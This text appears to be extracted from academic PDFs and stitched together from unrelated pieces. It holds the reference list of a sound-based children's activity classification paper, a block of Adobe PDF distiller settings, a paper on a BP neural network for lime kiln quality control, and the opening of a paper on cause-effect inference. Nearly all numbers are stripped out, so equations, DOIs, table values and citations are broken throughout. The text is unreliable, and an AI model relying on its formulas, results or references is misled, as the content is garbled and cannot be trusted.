. /j.future. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /jiot. . http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /science.aaa http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ jordao a, nazare ac jr, sena j, schwartz wr. . human activity recognition based on wearable sensor data: a standardization of the state-of-the-art. arxiv. available at https://arxiv.org/abs/ . . karlik b, olgac av. . performance analysis of various activation functions in generalized mlp architectures of neural networks. international journal of artificial intelligence and expert systems ( ): – . kepuska v, bohouta g. . next-generation of virtual personal assistants (microsoft cortana, apple siri, amazon alexa and google home). in: ieee th annual computing and communication workshop and conference (ccwc). piscataway: ieee, – . keras team. . keras documentation: adam. available at https://keras.io/api/optimizers/adam/ (accessed september ). ketkar n. . introduction to keras. in: deep learning with python. berlin: springer, – . kia mb, pirasteh s, pradhan b, mahmud ar, sulaiman wna, moradi a. . an artificial neural network model for flood simulation using gis: johor river basin, malaysia. environmental earth sciences ( ): – doi . /s - - -z. kingma dp, ba j. . adam: a method for stochastic optimization. arxiv. available at https://arxiv.org/abs/ . . koidl k. . loss functions in classification tasks. dublin: school of computer science and statistic trinity college. kurashima s, suzuki s. . improvement of activity recognition for child growth monitoring system at kindergarten. in: iecon - st annual conference of the ieee industrial electronics society. piscataway: ieee, – . lee s-m, yoon sm, cho h. . human activity recognition from accelerometer data using convolutional neural network. in: ieee international conference on big data and smart computing (bigcomp). piscataway: ieee, – . li s, da xu l, zhao s. . the internet of things: a survey. information systems frontiers ( ): – doi . /s - - - . li x, zhang y, marsic i, sarcevic a, burd rs. . deep learning for rfid-based activity recognition. in: proceedings of the th acm conference on embedded network sensor systems cd-rom. new york: acm, – . liang d, thomaz e. . audio-based activities of daily living (adl) recognition with large-scale acoustic embeddings from online videos. proceedings of the acm on interactive, mobile, wearable and ubiquitous technologies ( ): – doi . / . liu w, wen y, yu z, yang m. . large-margin softmax loss for convolutional neural networks. icml : . lloret j, canovas a, sendra s, parra l. . a smart communication architecture for ambient assisted living. ieee communications magazine ( ): – doi . /mcom. . . lópez g, quesada l, guerrero la. . alexa vs. siri vs. cortana vs. google assistant: a comparison of speech-based natural user interfaces. in: international conference on applied human factors and ergonomics, berlin: springer, – . lu h, zhang h, nayak a. . a deep neural network for audio classification with a classifier attention mechanism. arxiv. available at https://arxiv.org/abs/ . . lubina p, rudzki m. . artificial neural networks in accelerometer-based human activity recognition. in: nd international conference mixed design of integrated circuits & systems (mixdes). piscataway: ieee, – . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . https://keras.io/api/optimizers/adam/ http://dx.doi.org/ . /s - - -z https://arxiv.org/abs/ . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /mcom. . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lyu l, he x, law yw, palaniswami m. . privacy-preserving collaborative deep learning with application to human activity recognition. in: proceedings of the acm on conference on information and knowledge management. new york: acm, – . mannini a, rosenberger m, haskell wl, sabatini am, intille ss. . activity recognition in youth using single accelerometer placed at wrist or ankle. medicine and science in sports and exercise ( ): – doi . /mss. . mascia m, canclini a, antonacci f, tagliasacchi m, sarti a, tubaro s. . forensic and anti- forensic analysis of indoor/outdoor classifiers based on acoustic clues. in: rd european signal processing conference (eusipco). memon m, wagner sr, pedersen cf, beevi fha, hansen fo. . ambient assisted living healthcare frameworks, platforms, standards, and quality attributes. sensors ( ): – doi . /s . monteiro j, granada r, barros rc, meneguzzi f. . deep neural networks for kitchen activity recognition. in: international joint conference on neural networks (ijcnn). murad a, pyun j-y. . deep recurrent neural networks for human activity recognition. sensors ( ): doi . /s . myo ww, wettayaprasit w, aiyarak p. . designing classifier for human activity recognition using artificial neural network. in: ieee th international conference on computer and communication systems (icccs). piscataway: ieee, – . nikam ss. . a comparative study of classification techniques in data mining algorithms. oriental journal of computer science & technology ( ): – . nweke hf, teh yw, al-garadi ma, alo ur. . deep learning algorithms for human activity recognition using mobile and wearable sensor networks: state of the art and research challenges. expert systems with applications : – doi . /j.eswa. . . . oyedare t, park j-mj. . estimating the required training dataset size for transmitter classification using deep learning. in: ieee international symposium on dynamic spectrum access networks (dyspan). piscataway: ieee, – . paul p, george t. . an effective approach for human activity recognition on smartphone. in: ieee international conference on engineering and technology (icetech). piscataway: ieee, – . piczak kj. . environmental sound classification with convolutional neural networks. in: ieee th international workshop on machine learning for signal processing (mlsp). piscataway: ieee, – . rafferty j, nugent cd, liu j, chen l. . from activity recognition to intention recognition for assisted living within smart homes. ieee transactions on human-machine systems ( ): – doi . /thms. . . ramachandran p, zoph b, le qv. . searching for activation functions. arxiv. available at https://arxiv.org/abs/ . . reyes-ortiz j-l, oneto l, samà a, parra x, anguita d. . transition-aware human activity recognition using smartphones. neurocomputing : – doi . /j.neucom. . . . robinson dc, sanders da, mazharsolook e. . ambient intelligence for optimal manufacturing and energy efficiency. assembly automation ( ): – doi . /aa- - - . roda c, rodrguez ac, lópez-jaquero v, navarro e, gonzález p. . a multi-agent system for acquired brain injury rehabilitation in ambient intelligence environments. neurocomputing : – doi . /j.neucom. . . . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /mss. http://dx.doi.org/ . /s http://dx.doi.org/ . /s http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /thms. . https://arxiv.org/abs/ . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /aa- - - http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ronao ca, cho s-b. . human activity recognition with smartphone sensors using deep learning neural networks. expert systems with applications : – doi . /j.eswa. . . . rong f. . audio classification method based on machine learning. in: international conference on intelligent transportation, big data & smart city (icitbs). piscataway: ieee, – . rubinstein ry, kroese dp. . the cross-entropy method: a unified approach to combinatorial optimization, monte-carlo simulation and machine learning. berlin: springer science & business media. ruder s. . an overview of gradient descent optimization algorithms. arxiv. available at https://arxiv.org/abs/ . . scheirer ed. . tempo and beat analysis of acoustic musical signals. journal of the acoustical society of america ( ): – doi . / . . sebestyen g, stoica i, hangan a. . human activity recognition and monitoring for elderly people. in: ieee th international conference on intelligent computer communication and processing (iccp). piscataway: ieee, – . shoaib m, bosch s, incel od, scholten h, havinga pj. . a survey of online activity recognition using mobile phones. sensors ( ): – doi . /s . sim jm, lee y, kwon o. . acoustic sensor based recognition of human activity in everyday life for smart home services. international journal of distributed sensor networks ( ): doi . / / . simonyan k, zisserman a. . very deep convolutional networks for large-scale image recognition. arxiv. available at https://arxiv.org/abs/ . . sousa lima w, souto e, el-khatib k, jalali r, gama j. . human activity recognition using inertial sensors in a smartphone: an overview. sensors ( ): doi . /s . stipanicev d, bodrozic l, stula m. . environmental intelligence based on advanced sensor networks. in: th international workshop on systems, signals and image processing and th eurasip conference focused on speech and image processing, multimedia communications and services. piscataway: ieee, – . stork ja, spinello l, silva j, arras ko. . audio-based human activity recognition using non-markovian ensemble voting. in: ieee ro-man: the st ieee international symposium on robot and human interactive communication. piscataway: ieee. suto j, oniga s. . efficiency investigation of artificial neural networks in human activity recognition. journal of ambient intelligence and humanized computing ( ): – doi . /s - - - . tarzia sp, dinda pa, dick rp, memik g. . indoor localization without infrastructure using the acoustic background spectrum. in: proceedings of the th international conference on mobile systems, applications, and services, – . taylor w, shah sa, dashtipour k, zahid a, abbasi qh, imran ma. . an intelligent non- invasive real-time human activity recognition system for next-generation healthcare. sensors ( ): doi . /s . trost sg, cliff d, ahmadi m, van tuc n, hagenbuchner m. . sensor-enabled activity class recognition in preschoolers: hip versus wrist data. medicine and science in sports and exercise ( ): – doi . /mss. . uddin mt, billah mm, hossain mf. . random forests based recognition of human activities and postural transitions on smartphone. in: th international conference on informatics, electronics and vision (iciev). piscataway: ieee, – . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.eswa. . . https://arxiv.org/abs/ . http://dx.doi.org/ . / . http://dx.doi.org/ . /s http://dx.doi.org/ . / / https://arxiv.org/abs/ . http://dx.doi.org/ . /s http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s http://dx.doi.org/ . /mss. http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ uddin mt, uddiny ma. . human activity recognition from wearable sensors using extremely randomized trees. in: international conference on electrical engineering and information communication technology (iceeict). piscataway: ieee, – . uddin mz. . a wearable sensor-based activity prediction system to facilitate edge computing in smart healthcare system. journal of parallel and distributed computing : – doi . /j.jpdc. . . . van der oord a, dieleman s, zen h, simonyan k, vinyals o, graves a, kalchbrenner n, senior a, kavukcuoglu k. . wavenet: a generative model for raw audio. arxiv. available at https://arxiv.org/abs/ . . van rossum g. . python programming language. in: usenix annual technical conference, : . wang a, chen g, yang j, zhao s, chang c-y. . a comparative study on human activity recognition using inertial sensors in a smartphone. ieee sensors journal ( ): – doi . /jsen. . . wang h, divakaran a, vetro a, chang s-f, sun h. . survey of compressed-domain features used in audio-visual indexing and analysis. journal of visual communication and image representation ( ): – doi . /s - ( ) - . wang s, zhou g. . a review on radio based activity recognition. digital communications and networks ( ): – doi . /j.dcan. . . . westeyn tl, abowd gd, starner te, johnson jm, presti pw, weaver ka. . monitoring children’s developmental progress using augmented toys and activity recognition. personal and ubiquitous computing ( ): – doi . /s - - - . wortmann f, flüchter k. . internet of things. business & information systems engineering ( ): – doi . /s - - - . yarotsky d. . error bounds for approximations with deep relu networks. neural networks : – doi . /j.neunet. . . . zeng y, mao h, peng d, yi z. . spectrogram based multi-task audio classification. multimedia tools and applications ( ): – doi . /s - - - . zhang s, qin y, sun k, lin y. . few-shot audio classification with attentional graph neural networks. in: interspeech, – . ziuziański p, furmankiewicz m, sołtysik-piorunkiewicz a. . e-health artificial intelligence system implementation: case study of knowledge management dashboard of epidemiological data in poland. international journal of biology and biomedical engineering : – . garcía-domínguez et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.jpdc. . . https://arxiv.org/abs/ . http://dx.doi.org/ . /jsen. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /j.dcan. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.neunet. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ deep artificial neural network based on environmental sound data for the generation of a children activity classification model introduction materials and methods experiments and results discussion conclusions future work references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice your paper's title starts here: international journal of advanced network, monitoring and controls volume , no. , application of improved bp neural network in hybrid control model of lime quality lingli zhu * college of information technology luoyang normal university luoyang, , china e-mail: zhulinglils@ .com tingzhong wang college of information technology luoyang normal university luoyang, , china abstract—in this paper, a method of combining neural network with expert system is proposed, which can realize the control model of real time feedback and control parameters. the model is based on the parameters of production condition, and the current lime quality is predicted. through the quality of lime and control parameters, using association rule base of expert system, reasoning that lime control parameter adjustment, timely feedback to the lime production control system, to achieve the purpose of real-time control of the quality of lime. the paper presents application of improved bp neural network in hybrid control model of lime quality. keywords-improved neural network; lime; expert system; bp; hybrid control i. introduction the production control process of the rotary kiln is the production of high quality lime under the premise of stable output. the automatic control system of lime rotary kiln can control the quality of the product by controlling the operation of the fuel quantity, air quantity, and equipment. however, the quality of lime can not be obtained in real time, and the production control system can not get the product quality information in time [ ]. at present, the control system of lime rotary kiln is the main technology workers. through the process system on-line monitoring state parameters to predict the current product quality, and it is as the basis for the adjustment of control parameters. the quality of products is greatly influenced by artificial judgment or off-line detection. in this paper, the ability of the neural network is used to deal with the nonlinear mapping problem, and the quality of the product is predicted based on the on-line monitoring state parameters. combined with experience of experts in the field and the production of large amounts of data knowledge mining association rules from database and matching products quality prediction results and adjusting control parameters, obtained the lime rotary kiln control parameter correction information, lime rotary kiln control system for product quality of real time pre measurement and accurate feedback adjustment of intelligent control. ii. model and key technology of product quality control of lime rotary kiln the product quality control model flow chart of lime rotary kiln is shown in figure . the data preprocessing module receives data from the automatic control system of the lime rotary kiln and the data stored in the database. and then the product quality prediction model is activated according to the preset time interval. forecast to the product quality and the quality of the pre - set quality information. to maintain the original control parameter information and you meet the requirements. if not up to meet the requirements, combined with the control parameters and product quality information, through association rules base matching control to adjust the parameters of, and feedback to the automatic control system of lime rotary kiln. the activity of the product can be reduced by the lime burning or over burning, but the burning and burning of the lime is completely different from the operation, so it is necessary to distinguish the state of the lime. secondly, the different chemical composition of raw material production of lime activity difference is very big, the different raw material must have the corresponding product quality requirements. therefore, in order to make a correct judgment, the quality of the product must be compared with the corresponding product quality setting. bp neural network is composed of input layer (x), hidden layer (h) and output layer (z). the hidden layer (h) can be one or more layers, and the article chooses only one layer of hidden layer of neural network [ ]. for the three layer bp neural network, the hidden layer node number can be determined by using the following formula. p m n   where: m is the input layer node number, n is the output layer node number, p is the hidden layer node number. bp neural network is a kind of iterative algorithm for the forward propagation of data and the error back propagation. the input signal propagates through the activation function to the hidden layer, and the hidden layer nodes are transmitted to the output layer by the activation function. by calculating output between neurons and the expected output error, in accordance with the negative gradient of error modify the weight of each layer, error signal along the path to the original return, to calculate the output, as is shown by figure , until the error achieve ideal value. doi: . /ijanmc- - international journal of advanced network, monitoring and controls volume , no. , figure . flow chart of control mode lime rotary kiln control system online condition monitoring parameters (x) many, some reflect the process of production condition parameters of the system, some safety protection monitoring parameters, more two features in both. according to the actual production experience, exhaust gas temperature (x ), the tail of the kiln temperature (x ), kiln pressure (x ), secondary air temperature (x ), feed temperature (x ) are reflected lime quality is the most significant factor. the control parameters (y) of the lime rotary kiln are essentially determined by the quality of the product. including fuel consumption (y ), rotary kiln rotation speed (y ), the main exhaust fan (y ) and other control parameters is the product quality of the decisive parameters. product quality information (z) contains the lime activity (z ) and the (z ) [ ][ ][ ]. first, it is the higher the activity of lime, the better the quality of the product. in the ideal state, there is no maximum level of activity of the lime, which has the highest degree of burning or burning. in the process of production of lime rotary kiln, there are inevitable abnormal conditions, such as mechanical equipment failure, monitoring equipment abnormal and so on will cause the distortion of online detection data. if you do not filter out the data, it will cause the system model to send out the wrong instruction, affecting the normal operation of the system. for this kind of abnormal data points to take filtering, mean filling and other means to ensure the accuracy and integrity of the data. iii. construction of expert system rule base prediction to the quality of the product is not ideal, the need to adjust the control parameters to achieve the purpose of product quality control. through the neural network prediction period of product quality information model is obtained, and presupposition information after comparing the parameters ( j j z z z   , j z ) and control parameters ( , , j j j y y y ) as the association rule premise, matching the amount of correction of the control parameters as output item ( , , j j j y y y   ), then optimized control parameters in the next time interval for: j j j n n n y y y     (,,) bp neural network algorithm is as follows: ( )initialization. in the form ( ), the value of the license is randomly assigned to the initial value of the network, setting the number of learning times n and calculating precision. ( )a study sample k input and the corresponding expected output. ( )the output value of i node is calculated.     m ai a k k i a i h f x            ( ) j node output value of the output layer.     j i o p k k i j i z f h            ( ) calculating the weights between the output layer and the hidden layer.       + + i j i + k kn n n n n n i i b h b            which is the learning rate, b is the additional momentum. the value of the judgment is determined by the formula ( ) and ( ) [ ]. ( ) calculating the weights between the hidden layer and the input layer. international journal of advanced network, monitoring and controls volume , no. ,       + + ai i a + k kn n n n n n ai ai b x b            ( )judgment. sample not read, jump second steps. otherwise the next step. ( )according to the corrected formula weights ( ) ( ), fixed weights. the output of each layer is calculated by the formula ( ). ( )to calculate the global error.      k n j k k k j j k e z zo      ( )judgment. does the error reach the design accuracy or exceed the maximum number of training sessions, and then the error is. no, then make n=n++, return second steps. the model association rule mining algorithm using olap and apriori algorithm, to find the relationship between product quality information and control parameters adjustment. product quality information and control parameters of the association rules mining, with the help of the production process by the control parameters to adjust the information on the quality of the product data. on-line analytical processing technology is the main tool of data analysis in data warehouse. the olap system uses the data storage scheme of materialized data cube, in exchange for the space cost for time efficiency. for association rule mining, a large amount of intermediate data which is used in the mining process may already be materialized in the data cube and not need to be re calculated. iv. running examples of neural network forecast model sample data is from a steel mill nissan tons of lime rotary kiln production line. the enterprise product quality detection is per hour from the sampling hole sampling time, artificial naked eye observation quality of products; sampling every hours on the quality of the products by experimental method determination of a, so the sample selection experimental measurement data shall prevail. select the normal operation of the equipment in the case of days and data for the sample, of which were used as training samples, as a test sample, as is shown by table . table i. sample no. the temperat ure of exhaust gas (℃) the temperat ure of inlet (℃) the pressure of inlet (pa) the temperat ure of the second air (℃) the temperat ure of product (℃) activity (ml) product state - . over-burn ed - . over-burn ed - . under-bur ned … … … … … … … … - . under-bur ned . under-bur ned - . over-burn ed - . under-bur ned - . over-burn ed … … … … … … … … - . under-bur ned - . under-bur ned definition : the sum rule for the attribute values of the same attribute in the n dimensional data is as follows: let sum=attribute.value +attribute.value if attribute.value is not empty and attribute.value ==attribute.value , then sum=n+ ; if attribute.value is null and attribute.values is not empty, or attribute.value is not empty and attribute.value is empty, then sum= ; in other cases, sum= . the rule can be used to determine whether the frequent attribute sets satisfy the connection conditions. to judge two k-item frequent attribute set trans and trans whether that international journal of advanced network, monitoring and controls volume , no. , satisfies the join condition, and trans trans the corresponding added and all the sum of the results accumulated the resulting value to result. write n for the number of fields in the data table, if result= (n + ) (k- ) + , and trans trans a (k- ) of non null attribute values are the same, two attribute values are different, and different two attribute values and are . that was non null attribute value and attribute values are added. at this point, trans and trans meet the connection conditions, can be connected operation. otherwise, trans and trans can not be connected operation. the meet the connection conditions of frequent sets trans and trans , can be achieved by the "add" connection operation. in order to carry out the operation of the frequent attribute set, the "or" rule of the value of the attribute is defined first. from the production site, the use of the quality control system before and after month of the measured lime activity contrast as shown in figure . the sample a c t i v i ty after before figure . the contrast of product quality before and after used the system from figure it can be seen that the use of the quality control system, the average lime activity is about ml, compared with the previous product, the average ml level has greatly improved. in addition to the specific time period, the change of the activity of the lime is kept within ml, which indicates that the stability of the lime production system is greatly improved. v. conclusion this paper presents a combination of neural network and association rule library based on lime rotary kiln products quality prediction and control parameters feedback control model can be in line completed the accurate prediction of the quality of the products and to achieve timely control parameter adjusting information feedback. in the control model, the process of reading and processing the data of the state parameter is added to improve the robustness of the control model, and reduce the influence of equipment failure on the system stability. acknowledgements this paper is supported by science and technology project of henan province ( , ). references [ ] liu xiao-li, wang shen-tao, dai rui, wei shi-feng, “on fault diagnosis of net work based on improved particle swarm optimization”, computer applications and software, vol. , no. , ( ),pp. - . [ ] wang cheng-liang,pang xu,lu zhi-jian, “research on hybrid control methods of aluminium reduction on neural network”, application research of computer, vol. ,no. , ( ),pp. - . [ ] li dao-zhong,zhang lei,wu zhao-hui, “test method of physical metallurgical lime, bei jing:metallurgical industry press,( ),pp. - . [ ] chu hui, lai hui-cheng, “an improved back-propagation n algoriythm and its application”, computer simulation,vol. , no. , ( ), pp. - . [ ] shi zhong-zhi, “knowledge discovery”,bei jing:tsinghua university press, ( ),pp. - . [ ] zhang lei, hu chun, qian feng, “research progress of bp algorithm for local minimum problem”, the industrial control computer, vol. ,no. , ( ),pp. - . submitted september accepted december published january corresponding author patrick blöbaum, bloebaum@ar.sanken.osaka-u.ac.jp academic editor charles elkan additional information and declarations can be found on page doi . /peerj-cs. copyright blöbaum et al. distributed under creative commons cc-by . open access analysis of cause-effect inference by comparing regression errors patrick blöbaum , dominik janzing , takashi washio , shohei shimizu and bernhard schölkopf osaka university, osaka, japan mpi for intelligent systems, tübingen, germany shiga university, shiga, japan abstract we address the problem of inferring the causal direction between two variables by comparing the least-squares errors of the predictions in both possible directions. under the assumption of an independence between the function relating cause and effect, the conditional noise distribution, and the distribution of the cause, we show that the errors are smaller in causal direction if both variables are equally scaled and the causal relation is close to deterministic. based on this, we provide an easily applicable algorithm that only requires a regression in both possible causal directions and a comparison of the errors. the performance of the algorithm is compared with various related causal inference methods in different artificial and real-world data sets. subjects artificial intelligence, data mining and machine learning keywords causality, causal discovery, cause-effect inference introduction causal inference (spirtes, glymour & scheines, ; pearl, ) is becoming an increasingly popular topic in machine learning. the results are often not only of interest in predicting the result of potential interventions, but also in general statistical and machine learning applications (peters, janzing & schölkopf, ). while the causal relationship between variables can generally be discovered by performing specific randomized experiments, such experiments can be very costly, infeasible or unethical . in particular, the identification of the causal direction between two variables without performing any interventions is a challenging task. however, recent research developments in causal discovery allow, under certain assumptions, inference of the causal direction between two variables purely based on observational data (kano & shimizu, ; comley & dowe, ; shimizu et al., ; sun, janzing & schölkopf, ; zhang & hyvärinen, ; hoyer et al., ; janzing, sun & schölkopf, ; daniušis et al., ; peters, janzing & schölkopf, ; janzing et al., ; sgouritsa et al., ; mooij et al., ; marx & vreeken, ). in regard to the present work, we further contribute to the causal discovery in an unconfounded bivariate setting based on observational data, where one variable is the cause and the other variable is the effect. that is, given observed data x,y that are drawn from a joint distribution px,y , we are interested in inferring whether x caused y or y caused x. in this sense, we define x as the cause and y as the effect if intervening on x how to cite this article blöbaum p, janzing d, washio t, shimizu s, schölkopf b. . analysis of cause-effect inference by comparing regression errors. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com mailto:bloebaum@ar.sanken.osaka-u.ac.jp https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. further discussions about ethics in randomized experiments, especially in the context of clinical trials, can be found in rosner ( ). the data is taken from https://webdav. tuebingen.mpg.de/cause-effect/ and further discussed in mooij et al. ( ). national income (in usd) l ife e xp e ct a n cy ( in y e a rs ) life expectancy (in years) n a tio n a l i n co m e ( in u s d ) (a) (b) figure a comparison of the national income of countries and the life expectancy at birth. (a) the national income on the x-axis and the life expectancy on the y-axis. (b) the life expectancy on the x- axis and the national income on the y-axis. full-size doi: . /peerjcs. /fig- changes the distribution of y . in the following, we use the term ’causal inference’ to refer to the identification of the true causal direction. a possible application is the discovery of molecular pathways, which relies on the identification of causal molecular interactions in genomics data (statnikov et al., ). other examples in biomedicine where observational data can be used for causal discovery are discussed in the work by ma & statnikov ( ). an example for a bivariate relationship is provided in fig. , where the national income of countries are compared with the life expectancy at birth . here, a clear statement about the causal relationship is not obvious. it has been argued that richer countries have a better health care system than poorer countries. hence, a higher national income leads to a higher life expectancy (mooij et al., ). based on the plots, this causal relationship is not clear at all. nevertheless, we provide a way to correctly determine the causal direction by only using these data points. conventional approaches to causal inference rely on conditional independences and therefore require at least three observed variables. given the observed pattern of conditional dependences and independences, one infers a class of directed acyclic graphs (dags) that is compatible with the respective pattern (subject to markov condition and faithfulness assumption (spirtes, glymour & scheines, ; pearl, )). whenever there are causal arrows that are common to all dags in the class, conditional (in)dependences yield definite statements about causal directions. in a bivariate setting, however, we rely on asymmetries between cause and effect that are already apparent in the bivariate distribution alone. one kind of asymmetry is given by restricting the structural equations relating cause and effect to a certain function class: for linear relations with non-gaussian independent noise, the linear non-gaussian acyclic model (lingam) (shimizu et al., ) provides a method to identify the correct causal direction. for nonlinear relations, the additive noise model (anm) (hoyer et al., ) and its generalization to post-nonlinear models (pnl) (zhang & hyvärinen, ) identify the causal direction by assuming an independence blöbaum et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://webdav.tuebingen.mpg.de/cause-effect/ https://webdav.tuebingen.mpg.de/cause-effect/ https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. between cause and noise, where, apart from some exceptions such as bivariate gaussian, a model can only be fit in the correct causal direction such that the input is independent of the residual. further recentapproaches forthe bivariatesetting arebased on an informal independence assumption stating that the distribution of the cause (denoted by pc) contains no information about the conditional distribution of the effect given the cause (denoted by pe|c). here, the formalization of ‘no information’ is a challenging task. for the purpose of foundational insights (rather than for practical purposes), janzing & schölkopf ( ) and lemeire & janzing ( ) formalize the idea via algorithmic information and postulate that knowing pc does not enable a shorter description of pe|c and vice versa. using algorithmic information theory, one can, for instance, show that the algorithmic independence of pc and pe|c implies k(pc)+k(pe|c)≤k(pe)+k(pc|e), ( ) if k denotes the description length of a distribution in terms of its kolmogorov complexity (for details see section . . in peters, janzing & schölkopf ( )). in this 